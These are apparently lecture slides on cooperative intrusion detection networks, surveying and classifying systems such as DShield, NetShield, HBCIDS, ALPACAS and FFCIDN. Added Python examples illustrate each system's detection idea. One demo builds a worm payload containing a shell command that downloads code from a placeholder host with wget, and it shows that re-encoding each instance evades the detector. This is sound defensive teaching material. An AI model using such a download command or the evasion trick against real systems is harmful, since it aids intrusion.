Chapter 9: Cooperation in Intrusion Detection Networks
Authors: Carol Fung and Raouf Boutaba
Editors: M. S. Obaidat and S. Misra
John Wiley & Sons publishing

Network Intrusions
• Unwanted traffic or computer activities that may be malicious and destructive
  – Denial of Service
  – Identity theft
  – Spam mails
• Single-host intrusions
• Cooperative attacks

Intrusion Detection Systems
• Designed to monitor network traffic or computer activities and alert administrators to suspicious intrusions
  – Signature-based and anomaly-based
  – Host-based and network-based
[Figure 1. An example of a host-based IDS and a network-based IDS]

Cooperative IDS
• IDSs use collective information from others to make more accurate intrusion detection decisions
• Several features of a CIDN
  – Topology
  – Cooperation scope
  – Specialization
  – Cooperation technology

Cooperation Technology
• Data correlation
• Trust management
• Load balance

Table 1. Classification of Cooperative Intrusion Detection Networks

IDN           Topology       Scope    Specialization  Technology and algorithm
Indra         Distributed    Local    Worm            -
DOMINO        Decentralized  Hybrid   Worm            -
DShield       Centralized    Global   General         Data correlation
NetShield     Distributed    Global   Worm            Load-balancing
Gossip        Distributed    Local    Worm            -
Worminator    -              Global   Worm            -
ABDIAS        Decentralized  Hybrid   General         Trust management
CRIM          Centralized    Local    General         Data correlation
HBCIDS        Distributed    Global   General         Trust management
ALPACAS       Distributed    Global   Spam            Load-balancing
CDDHT         Decentralized  Local    General         -
SmartScreen   Centralized    Global   Phishing        -
FFCIDN        Centralized    Global   Botnet          Data correlation

Indra
• An early proposal for cooperative intrusion detection
• Cooperating nodes take a proactive approach and share their blacklists with others

DOMINO
• Monitors Internet outbreaks for large-scale networks
• Nodes are organized hierarchically
• Different roles are assigned to nodes

DShield
• A centralized firewall log correlation system
• Data comes from the SANS Internet Storm Center
• Not a real-time analysis system
• Data payload is removed for privacy concerns

NetShield
• A fully distributed system to monitor epidemic worms and DoS attacks
• The Chord DHT P2P system is used to load-balance the participating nodes
• An alarm is triggered if the local prevalence of a content block exceeds a threshold
• Only works on worms with fixed attack traces; does not work on polymorphic worms

Gossip-based Intrusion Detection
• A local epidemic worm monitoring system
• A local detector raises an alert when the number of newly created connections exceeds a threshold
• A Bayesian network analysis system is used to correlate and aggregate alerts

ABDIAS
• Agent-based distributed alert system
• IDSs are grouped into communities
• Intra-community and inter-community communication
• A Bayesian network system is used to make decisions

CRIM
• A centralized system to collect alerts from participating IDSs
• Alert correlation rules are generated by humans offline
• New rules are used to detect global-wide intrusions

Host-based CIDS (HBCIDS)
• A cooperative intrusion detection system where IDSs share detection experience with others
• Alerts from one host are sent to neighbors for analysis
• Feedback is aggregated based on the trustworthiness of each neighbor
• Trust values are updated after every interaction experience

ALPACAS
• A cooperative spam filtering system
• Preserves the privacy of the email owners
• A P2P system is used for scalability
• Emails are divided into feature trunks and digested into feature fingerprints

SmartScreen
• Phishing URL filtering system in IE8
• Allows users to report phishing websites
• A centralized decision system analyzes the collected data and generates the blacklist
• Users browsing a phishing site are warned by SmartScreen

FFCIDN
• A collaborative intrusion detection network to detect fast-flux botnets
• Observes the number of unique IP addresses a domain has
• A threshold is derived to decide whether the domain is a fast-flux phishing domain

Open Challenges
• Privacy of the exchanged information
• Incentives for IDS cooperation
• Botnet detection and removal

Conclusion
• CIDNs use collective information from participants to achieve higher intrusion detection accuracy
• A taxonomy to categorize different CIDNs
  – Four features are proposed for the taxonomy
• Future challenges include how to encourage participation and how to provide privacy for data sharing among IDSs
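Added illustration of the NetShield slide's content-block prevalence alarm and of its stated limitation (fixed attack traces only). This is not NetShield's code: the block size, stride, the two thresholds and the payloads are all assumptions constructed for the example, and the polymorphic case is modelled simply as re-encoding every instance under a different key.

```python
"""Content-block prevalence alarm in the spirit of the NetShield slide.
Added illustration; not NetShield's code. Block size, stride and the two
thresholds are assumed parameters, and the payloads are constructed."""
import hashlib
from collections import defaultdict

BLOCK_SIZE = 16  # assumed length of a content block (bytes)
STRIDE = 8       # assumed offset between consecutive blocks


def content_blocks(payload: bytes):
    """Digest each fixed-size window of the payload into a short block id."""
    last_start = max(0, len(payload) - BLOCK_SIZE)
    for start in range(0, last_start + 1, STRIDE):
        yield hashlib.sha256(payload[start:start + BLOCK_SIZE]).hexdigest()[:16]


class PrevalenceDetector:
    """Counts how many flows, from how many distinct sources, carry each block."""

    def __init__(self, prevalence_threshold=4, min_sources=3):
        self.count = defaultdict(int)    # block id -> flows carrying it
        self.sources = defaultdict(set)  # block id -> distinct source addresses
        self.alarmed = set()             # blocks already reported
        self.prevalence_threshold = prevalence_threshold
        self.min_sources = min_sources

    def observe(self, src: str, payload: bytes):
        """Record one flow; return block ids whose prevalence crossed the threshold."""
        alarms = []
        for block in set(content_blocks(payload)):
            self.count[block] += 1
            self.sources[block].add(src)
            if (block not in self.alarmed
                    and self.count[block] >= self.prevalence_threshold
                    and len(self.sources[block]) >= self.min_sources):
                self.alarmed.add(block)
                alarms.append(block)
        return alarms


def demo():
    """Fixed-trace worm vs. a per-instance re-encoded (polymorphic-style) payload."""
    # Constructed payload: a fixed NOP sled around a fixed command string.
    worm = b"\x90" * 8 + b"/bin/sh -c 'wget http://x/evil'" + b"\x90" * 8

    fixed = PrevalenceDetector()
    fixed_alarms = []
    for i in range(5):
        fixed_alarms += fixed.observe(f"10.0.0.{i}", worm)

    # Same worm, but every instance XOR-encoded with a different key, so no
    # content block is shared across instances and prevalence never builds up.
    poly = PrevalenceDetector()
    poly_alarms = []
    for i in range(5):
        key = i + 1
        poly_alarms += poly.observe(f"10.0.1.{i}", bytes(b ^ key for b in worm))

    return len(fixed_alarms), len(poly_alarms)


if __name__ == "__main__":
    print(demo())  # (4, 0): the fixed worm's four blocks alarm, the mutated one never does
```

The source-dispersion check (min_sources) is there because prevalence alone also fires on content every client sends, such as common protocol headers; a deployed detector would additionally whitelist such blocks.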
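Added example of the trust-weighted feedback aggregation and per-interaction trust update described on the Host-based CIDS slide. It is not HBCIDS's own algorithm: the exponential-moving-average update rule, the initial trust value, the learning rate and the neighbour scores are assumptions chosen to make the effect visible.

```python
"""Trust-weighted feedback aggregation for a host-based CIDS. Added example,
not HBCIDS's own algorithm: the exponential-moving-average trust update and
the scores below are assumptions."""


class TrustManager:
    def __init__(self, neighbours, initial_trust=0.5, learning_rate=0.2):
        self.trust = {n: initial_trust for n in neighbours}
        self.learning_rate = learning_rate

    def aggregate(self, feedback):
        """feedback maps neighbour -> score in [0, 1] (1 = 'intrusion').
        Returns the trust-weighted mean, so untrusted neighbours barely count."""
        weight = sum(self.trust[n] for n in feedback)
        if weight == 0:
            return 0.0
        return sum(self.trust[n] * s for n, s in feedback.items()) / weight

    def update(self, feedback, truth):
        """After the host learns the true label (0 or 1), move each neighbour's
        trust toward 1 if its feedback agreed and toward 0 if it did not."""
        for n, s in feedback.items():
            agreement = 1.0 - abs(s - truth)
            self.trust[n] = ((1 - self.learning_rate) * self.trust[n]
                             + self.learning_rate * agreement)


def simulate(rounds=5):
    """Two honest neighbours and one that always reports the opposite."""
    tm = TrustManager(["n1", "n2", "liar"])
    for r in range(rounds):
        truth = r % 2  # constructed ground truth alternating 1, 0, 1, ...
        feedback = {"n1": float(truth), "n2": float(truth), "liar": float(1 - truth)}
        tm.update(feedback, truth)
    # A new alert: the honest neighbours say intrusion, the liar says benign.
    verdict = tm.aggregate({"n1": 0.9, "n2": 0.9, "liar": 0.1})
    return tm.trust, verdict


if __name__ == "__main__":
    trust, verdict = simulate()
    print(trust, round(verdict, 3))
```

With equal weights the final alert would score (0.9 + 0.9 + 0.1) / 3, about 0.63; after five interactions the liar's trust has decayed to roughly 0.16 and the verdict moves to about 0.83, which is the point of keeping trust per neighbour.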
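Added example of the feature-trunk fingerprinting on the ALPACAS slide, showing why a peer can score a message as spam without ever seeing its text. This is not ALPACAS code; it assumes a trunk is three consecutive words, digests trunks with an HMAC under a key shared by the cooperating filters (so that short trunks cannot be recovered by dictionary hashing), and uses constructed messages.

```python
"""Privacy-preserving spam fingerprints in the spirit of the ALPACAS slide.
Added example, not ALPACAS code. Assumptions: a feature trunk is a run of
three consecutive words, the digest is an HMAC under a key shared by the
cooperating filters, and the messages are constructed."""
import hashlib
import hmac
import re

TRUNK_WORDS = 3
SHARED_KEY = b"example-group-key"  # assumed; shared by the cooperating peers


def feature_fingerprints(text: str) -> set:
    """Split text into overlapping word trunks and digest each one.
    Only these digests leave the host, never the message text."""
    words = re.findall(r"\w+", text.lower())
    trunks = (" ".join(words[i:i + TRUNK_WORDS])
              for i in range(len(words) - TRUNK_WORDS + 1))
    return {hmac.new(SHARED_KEY, t.encode(), hashlib.sha256).hexdigest()[:16]
            for t in trunks}


class SpamPeer:
    """A cooperating filter that holds only fingerprints of known spam."""

    def __init__(self, known_spam):
        self.spam = set()
        for msg in known_spam:
            self.spam |= feature_fingerprints(msg)

    def match(self, fingerprints: set) -> float:
        """Fraction of a query's fingerprints already known as spam."""
        if not fingerprints:
            return 0.0
        return len(fingerprints & self.spam) / len(fingerprints)


# Constructed messages for the demonstration.
KNOWN_SPAM = ["Congratulations you have won a free cruise claim your prize now by calling this number"]
VARIANT = "Congratulations you have won a free cruise claim your reward now by calling this number"
LEGIT = "Hi team the quarterly report is attached please review before Friday"


def score(message: str) -> float:
    """What the local host learns back from a peer for one message."""
    peer = SpamPeer(KNOWN_SPAM)
    return peer.match(feature_fingerprints(message))


if __name__ == "__main__":
    for m in (KNOWN_SPAM[0], VARIANT, LEGIT):
        print(round(score(m), 3), m[:40])
```

Changing one word in the spam only disturbs the three trunks that contain it, so the variant still scores 10/13 against the peer's set while the unrelated message scores 0; a threshold such as 0.5 on that fraction gives the filtering decision.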
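Added example of the FFCIDN slide's rule: pool DNS resolutions from several cooperating sensors, count the unique IP addresses per domain, and flag domains above a derived threshold. This is not FFCIDN's code. The observations are constructed, and deriving the threshold as the mean plus k standard deviations of a known-benign baseline is an assumption; the slide says only that a threshold is derived.

```python
"""Fast-flux domain flagging from unique resolved IPs, as on the FFCIDN slide.
Added example, not FFCIDN's code. The DNS observations are constructed, and
deriving the threshold as mean + k standard deviations of a known-benign
baseline is an assumption (the slide only says a threshold is derived)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed (sensor, domain, resolved IP) records from three cooperating
# sensors; documentation/TEST-NET addresses only.
OBSERVATIONS = [
    ("sensor-a", "news.example", "198.51.100.10"),
    ("sensor-b", "news.example", "198.51.100.10"),
    ("sensor-a", "mail.example", "198.51.100.20"),
    ("sensor-c", "mail.example", "198.51.100.21"),
    ("sensor-b", "blog.example", "198.51.100.30"),
    ("sensor-a", "cdn.example", "203.0.113.1"),
    ("sensor-b", "cdn.example", "203.0.113.2"),
    ("sensor-c", "cdn.example", "203.0.113.3"),
] + [
    # A phishing domain whose A record rotates through a dozen bot addresses,
    # each sensor seeing only some of them.
    ("sensor-" + "abc"[i % 3], "secure-login-verify.example", f"192.0.2.{i + 1}")
    for i in range(12)
]
BENIGN_BASELINE = ["news.example", "mail.example", "blog.example", "cdn.example"]


def unique_ip_counts(observations):
    """Merge every sensor's sightings and count distinct IPs per domain."""
    ips = defaultdict(set)
    for _sensor, domain, ip in observations:
        ips[domain].add(ip)
    return {domain: len(addrs) for domain, addrs in ips.items()}


def derive_threshold(baseline_counts, k=3.0):
    """Assumed rule: mean plus k population standard deviations of benign counts."""
    return mean(baseline_counts) + k * pstdev(baseline_counts)


def detect_fast_flux(observations, benign_domains, k=3.0):
    """Return (flagged domains, threshold used)."""
    counts = unique_ip_counts(observations)
    baseline = [counts[d] for d in benign_domains if d in counts]
    threshold = derive_threshold(baseline, k)
    flagged = {d for d, c in counts.items() if c > threshold}
    return flagged, threshold


if __name__ == "__main__":
    flagged, threshold = detect_fast_flux(OBSERVATIONS, BENIGN_BASELINE)
    print(f"threshold={threshold:.2f} flagged={sorted(flagged)}")
```

No single sensor sees all twelve addresses, which is why the counting is done on the merged set; the baseline deliberately includes a multi-address CDN domain so that ordinary load-balanced hosting does not land above the threshold.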